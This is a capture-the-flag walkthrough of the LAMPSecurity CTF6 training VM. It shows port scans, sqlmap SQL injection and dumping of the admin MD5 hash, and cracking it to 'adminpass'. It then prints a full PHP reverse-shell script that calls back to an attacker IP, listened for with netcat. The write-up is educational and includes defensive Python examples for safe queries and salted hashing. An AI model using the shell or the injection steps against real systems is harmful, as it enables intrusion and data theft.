Source Information

Author: madirish2600
Series: LAMPSecurity
Download: download.vulnhub.com/lampsecurity/ctf6.zip

“The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available here.”


Getting Started

As always, remember that it’s recommended to use walkthroughs as a “booster” to your own work when attempting to own vulnerable applications.
“For the things we have to learn before we can do them, we learn by doing them.” –Aristotle

Starting out, let's use arp-scan to sweep our local network with ARP requests and identify that the CTF6 box has leased the IP address 10.0.88.8.

calvinbebop@Dolos:~$ arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.88.1	52:54:00:12:35:00	QEMU
10.0.88.3	08:00:27:d6:b4:6f	CADMUS COMPUTER SYSTEMS
10.0.88.8	08:00:27:f9:75:b0	CADMUS COMPUTER SYSTEMS

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.912 seconds (87.91 hosts/sec). 3 responded

Initial Service Enumeration

Now we’ll use Nmap to initiate a full TCP SYN scan of 10.0.88.8 and hopefully discover some potential attack vectors in the system. A complete description of the tool’s flag usage can be found here. As usual, we’ll start by utilizing the following flags:

Flag  Description
-sS   Utilize a TCP SYN scan
-sV   Probe open ports to determine service/version info
-sC   Run the default set of service scripts
-A    Enable OS detection, version detection, script scanning, and traceroute
-p-   Target all TCP ports from 1-65535

calvinbebop@Dolos:~$ sudo nmap -sS -sV -sC -A -p- 10.0.88.8
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-08 15:00 CST
Nmap scan report for 10.0.88.8
Host is up (0.00028s latency).
Not shown: 65525 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 14:a9:f4:11:dc:2c:4e:0d:45:6c:99:11:22:29:03:bc (DSA)
|_  2048 45:58:6c:98:3e:97:2a:da:e2:b8:6a:84:d4:6a:be:26 (RSA)
80/tcp   open  http     Apache httpd 2.2.3 ((CentOS))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: CTF 6 - Widgets Inc.
110/tcp  open  pop3     Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) UIDL TOP STLS RESP-CODES USER CAPA PIPELINING
| ssl-cert: Subject: commonName=imap.example.com
| Not valid before: 2009-06-23T23:53:41
|_Not valid after:  2010-06-23T23:53:41
|_ssl-date: 2018-12-08T21:00:32+00:00; 0s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
143/tcp  open  imap     Dovecot imapd
|_imap-capabilities: completed OK THREAD=REFERENCES Capability AUTH=PLAINA0001 UNSELECT NAMESPACE STARTTLS LITERAL+ CHILDREN MULTIAPPEND IMAP4rev1 LOGIN-REFERRALS IDLE SASL-IR SORT
| ssl-cert: Subject: commonName=imap.example.com
| Not valid before: 2009-06-23T23:53:41
|_Not valid after:  2010-06-23T23:53:41
|_ssl-date: 2018-12-08T21:00:32+00:00; 0s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
443/tcp  open  ssl/http Apache httpd 2.2.3 ((CentOS))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: CTF 6 - Widgets Inc.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-06-02T16:13:30
|_Not valid after:  2010-06-02T16:13:30
|_ssl-date: 2018-12-08T21:00:31+00:00; 0s from scanner time.
3306/tcp open  mysql    MySQL 5.0.45
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.45
|   Thread ID: 5
|   Capabilities flags: 41516
|   Some Capabilities: Support41Auth, SupportsTransactions, LongColumnFlag, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase
|_  Status: Autocommit
MAC Address: 08:00:27:F9:75:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 10.0.88.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.88 seconds

HTTP (80/TCP) Enumeration (Scanning)

There are quite a few open services available for us to target on CTF6. For this walkthrough we'll start a nikto scan of the web server in the background while we manually investigate CTF6's web application on 80/TCP or 443/TCP.

calvinbebop@Dolos:~$ nikto -h http://10.0.88.8
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.88.8
+ Target Hostname:    10.0.88.8
+ Target Port:        80
+ Start Time:         2018-12-08 15:14:03 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ Cookie roundcube_sessid created without the httponly flag
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 97164, size: 35791, mtime: Wed Oct 19 15:47:44 2095
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /sql/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8496 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2018-12-08 15:14:24 (GMT-6) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

HTTP (80/TCP) Manual Investigation

Welcome to CTF6's homepage, Widgets Inc.

Jumping right into the source of the home page, we're able to identify names and user accounts for a number of the website's staff members. This may come in handy if we need to attempt password brute-forcing later down the line.

Taking a look at one of the blog entries, we’re able to see that the web server is using the id parameter to specify which blog post to present. We can also note that this blog post was written by the admin account for this application.


SQL Injection Exploitation

Running through some basic SQL injection tests, we're able to verify that a SQLi vulnerability exists by passing MySQL's SLEEP function through the id parameter. In this instance, the function causes the web server to pause for 10 seconds before returning the blog post.

Passing this URL into sqlmap, we’re able to see that it finds three injection points via the id parameter!

calvinbebop@Dolos:~# sqlmap -u "http://10.0.88.8/index.php?id=4" -p "id"
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:07:52

[21:07:52] [INFO] testing connection to the target URL
[21:07:52] [INFO] testing if the target URL content is stable
[21:07:53] [INFO] target URL content is stable
[21:07:53] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[21:07:53] [INFO] testing for SQL injection on GET parameter 'id'
[21:07:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:07:53] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="non")
[21:07:53] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[21:07:58] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:07:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[21:07:58] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[21:07:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[21:07:58] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[21:07:58] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[21:07:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:07:58] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:07:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:07:58] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:07:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:07:58] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:07:58] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:07:58] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[21:07:59] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[21:07:59] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:07:59] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[21:07:59] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[21:07:59] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[21:07:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:07:59] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[21:07:59] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:07:59] [INFO] testing 'MySQL inline queries'
[21:07:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:07:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:07:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[21:07:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[21:07:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[21:07:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[21:07:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[21:08:09] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable 
[21:08:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:08:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:08:09] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:08:09] [INFO] target URL appears to have 7 columns in query
[21:08:09] [INFO] target URL appears to be UNION injectable with 7 columns
[21:08:09] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4 AND 5344=5344

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=4 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=4 UNION ALL SELECT NULL,NULL,CONCAT(0x7170626b71,0x6b5651616369484163717562684c6a4d5555544b4e6f596c58687373644e47516e7a734964696d4b,0x716a7a7871),NULL,NULL,NULL,NULL-- CVuw
---
[21:08:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[21:08:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.88.8'

[*] shutting down at 21:08:13
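
As an added illustration (not part of the original walkthrough or of the CTF6 application's code), the following Python models the flaw sqlmap just reported and its fix: a blog lookup that splices the id parameter into the SQL text next to a parameterised version, plus a small detector that flags the three payload shapes from the output above in URL-decoded access-log request lines. The table and column names and the sample log lines are constructed assumptions; SQLite stands in for MySQL, so the time-based SLEEP payload is only matched by the detector, not executed.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the cms database's blog table. The page only shows that
# the query behind index.php?id= returns 7 columns; the names below are assumptions.
POSTS = [
    (1, "admin", "Welcome", "First post", "2009-06-24", 0, "public"),
    (4, "admin", "Widgets", "All about widgets", "2009-06-28", 0, "public"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE event (id INTEGER, author TEXT, title TEXT, body TEXT,"
        " created TEXT, flags INTEGER, visibility TEXT)"
    )
    conn.executemany("INSERT INTO event VALUES (?,?,?,?,?,?,?)", POSTS)
    return conn


def fetch_post_vulnerable(conn, raw_id):
    """The pattern sqlmap exploited: the request value becomes part of the SQL text."""
    return conn.execute("SELECT * FROM event WHERE id = " + raw_id).fetchall()


def fetch_post_safe(conn, raw_id):
    """Hardened form: check the value's shape, then bind it as a parameter."""
    if not raw_id.isdigit():
        return []  # "4 AND 5344=5344" never reaches the database
    return conn.execute("SELECT * FROM event WHERE id = ?", (int(raw_id),)).fetchall()


# Signatures for the three techniques sqlmap reported against this host.
SQLI_PATTERNS = {
    "boolean": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "time": re.compile(r"\bSLEEP\s*\(", re.I),
    "union": re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S),
}


def classify_request(request_line):
    """Return the technique names whose signature appears in the URL-decoded request."""
    decoded = unquote_plus(request_line)
    return {name for name, pat in SQLI_PATTERNS.items() if pat.search(decoded)}


# Constructed access-log request lines modelled on the payloads sqlmap printed above.
SAMPLE_LOG = [
    "GET /index.php?id=4 HTTP/1.1",
    "GET /index.php?id=4%20AND%205344%3D5344 HTTP/1.1",
    "GET /index.php?id=4%20AND%20SLEEP%285%29 HTTP/1.1",
    "GET /index.php?id=4%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20x HTTP/1.1",
]


def scan_log(lines):
    """Pair each suspicious request line with the sorted list of techniques it matched."""
    hits = []
    for line in lines:
        techniques = classify_request(line)
        if techniques:
            hits.append((line, sorted(techniques)))
    return hits


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, true condition :", fetch_post_vulnerable(conn, "4 AND 5344=5344"))
    print("vulnerable, false condition:", fetch_post_vulnerable(conn, "4 AND 5344=5345"))
    print("safe, same payload         :", fetch_post_safe(conn, "4 AND 5344=5344"))
    for line, techniques in scan_log(SAMPLE_LOG):
        print(techniques, line)
```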

Using the previous injection points found by sqlmap, let's take a look at what tables are available to us in this database.

calvinbebop@Dolos:~# sqlmap -u "http://10.0.88.8/index.php?id=4" -p "id" --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:09:57

[21:09:57] [INFO] resuming back-end DBMS 'mysql' 
[21:09:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4 AND 5344=5344

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=4 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=4 UNION ALL SELECT NULL,NULL,CONCAT(0x7170626b71,0x6b5651616369484163717562684c6a4d5555544b4e6f596c58687373644e47516e7a734964696d4b,0x716a7a7871),NULL,NULL,NULL,NULL-- CVuw
---
[21:09:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[21:09:57] [INFO] fetching database names
[21:09:57] [INFO] fetching tables for databases: 'cms, information_schema, mysql, roundcube, test'
Database: cms
[3 tables]
+---------------------------------------+
| user                                  |
| event                                 |
| log                                   |
+---------------------------------------+

Database: roundcube
[6 tables]
+---------------------------------------+
| session                               |
| cache                                 |
| contacts                              |
| identities                            |
| messages                              |
| users                                 |
+---------------------------------------+

Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| PROFILING                             |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Database: mysql
[17 tables]
+---------------------------------------+
| user                                  |
| columns_priv                          |
| db                                    |
| func                                  |
| help_category                         |
| help_keyword                          |
| help_relation                         |
| help_topic                            |
| host                                  |
| proc                                  |
| procs_priv                            |
| tables_priv                           |
| time_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition                  |
| time_zone_transition_type             |
+---------------------------------------+

[21:09:57] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.88.8'

[*] shutting down at 21:09:57

The user table in the cms database looks interesting :)

calvinbebop@Dolos:~# sqlmap -u "http://10.0.88.8/index.php?id=4" -p "id" -D cms -T user
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:10:11

[21:10:11] [INFO] resuming back-end DBMS 'mysql' 
[21:10:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4 AND 5344=5344

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=4 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=4 UNION ALL SELECT NULL,NULL,CONCAT(0x7170626b71,0x6b5651616369484163717562684c6a4d5555544b4e6f596c58687373644e47516e7a734964696d4b,0x716a7a7871),NULL,NULL,NULL,NULL-- CVuw
---
[21:10:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[21:10:11] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.88.8'

[*] shutting down at 21:10:11

Sqlmap was able to extract the hashed password for the admin user account!

Database: cms
Table: user
[1 entry]
+---------+---------------+----------------------------------+
| user_id | user_username | user_password                    |
+---------+---------------+----------------------------------+
| 1       | admin         | 25e4ee4e9229397b6b17776bfceaf8e7 |
+---------+---------------+----------------------------------+

Hash Identification/Cracking

Using Hash-identifier (or an equivalent online tool), we’re able to determine that this is an MD5 hashed string.

calvinbebop@Dolos:~$ hash-identifier 
   #########################################################################
   #	 __  __ 		    		__		 	 ______    _____	       #
   #	/\ \/\ \		   		   /\ \ 		/\__  _\  /\  _ `\	       #
   #	\ \ \_\ \     __      ____ \ \ \___		\/_/\ \/  \ \ \/\ \	       #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R 							   #
   #							www.Blackploit.com 						   #
   #						       Root@Blackploit.com  				   #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 25e4ee4e9229397b6b17776bfceaf8e7

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Luckily for us, unsalted MD5 hashes are relatively easy to crack, and numerous online lookup services are happy to provide the "decrypted" string for a submitted hash.

Hash                              Type  Result
25e4ee4e9229397b6b17776bfceaf8e7  md5   adminpass
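
As an added example that is not from the original post, this Python shows why the lookup above works and what a defender changes: an unsalted MD5 digest is recovered from a precomputed table keyed by digest, while a per-user random salt and a slow KDF (PBKDF2-HMAC-SHA256 here) make that table useless and turn the same attack into a per-account effort. The wordlist and the iteration count are constructed assumptions.

```python
import hashlib
import hmac
import os

# Constructed wordlist; the online services mentioned above hold billions of entries.
WORDLIST = ["password", "123456", "widgets", "adminpass", "letmein"]

# Assumption: iteration count chosen for the demo; tune it to your own hardware budget.
PBKDF2_ROUNDS = 100_000


def md5_hex(word):
    """Plain MD5 of a password, the storage scheme found in cms.user."""
    return hashlib.md5(word.encode()).hexdigest()


def precompute_table(wordlist, hasher):
    """Build the kind of digest -> password table a lookup service uses."""
    return {hasher(word): word for word in wordlist}


def hash_password(password, salt=None):
    """Store a password with a fresh random salt and a slow KDF (PBKDF2-HMAC-SHA256)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ROUNDS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute the digest from the stored salt and rounds; compare in constant time."""
    algo, rounds, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    table = precompute_table(WORDLIST, md5_hex)
    # The digest sqlmap pulled from cms.user; the page reports it resolves to adminpass.
    print("page hash ->", table.get("25e4ee4e9229397b6b17776bfceaf8e7"))
    # Same password for two users: the salted records differ, so one table serves neither.
    first, second = hash_password("adminpass"), hash_password("adminpass")
    print("records identical:", first == second)
    print("both verify:", verify_password("adminpass", first), verify_password("adminpass", second))
    print("salted digest in MD5 table:", table.get(first.split("$")[3]))
```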

PHP Reverse Webshell Access (80/TCP)

Using our newfound password, we’re now able to gain access to the blog’s administrative panels.

One of the administrative pages appears to be a form that allows us to create new blog entries. As might be expected, I propose that we post a PHP script which, when retrieved, will open a reverse shell back to our own machine.

The contents of ctf6-webshell.php are as follows. Sourced from xl7dev’s Github.

<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.0.88.5';  // Attacker IP Address
$port = 5454;       // Our listening port (netcat)
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is sent down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	global $daemon;  // without this, $daemon is an undefined local and the check never fires
	if (!$daemon) {
		print "$string\n";
	}
}

?>

Using netcat to handle the incoming connection, we now have reverse shell access to the target CTF6 machine.

calvinbebop@Dolos:~# nc -nvlp 5454
listening on [any] 5454 ...
connect to [10.0.88.5] from (UNKNOWN) [10.0.88.8] 53965
Linux localhost.localdomain 2.6.18-92.el5 #1 SMP Tue Jun 10 18:49:47 EDT 2008 i686 i686 i386 GNU/Linux
 13:45:31 up  1:19,  0 users,  load average: 0.01, 0.01, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-3.2$ 


Local Enumeration/Exploit Attempt #1

Getting our bearings, it appears we’ve assumed control of the apache user.

